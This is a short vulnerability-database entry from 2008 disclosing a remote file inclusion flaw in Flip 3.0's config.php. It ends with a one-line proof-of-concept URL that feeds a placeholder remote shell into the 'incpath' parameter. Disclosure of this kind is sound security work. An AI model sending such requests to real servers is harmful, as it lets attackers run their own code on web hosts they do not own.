Flip 3.0 - config.php Remote File Inclusion

2008-07-21T00:00:00
ID EXPLOITPACK:67BE7E0915271BFFBCD8CDA4576CBF4D
Type exploitpack
Reporter Cru3l.b0y
Modified 2008-07-21T00:00:00

Description

Flip 3.0 - config.php Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/30312/info

Flip is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Flip 3.0 is vulnerable; other versions may also be affected. 

http://www.example.com/config.php?incpath=[SHELL]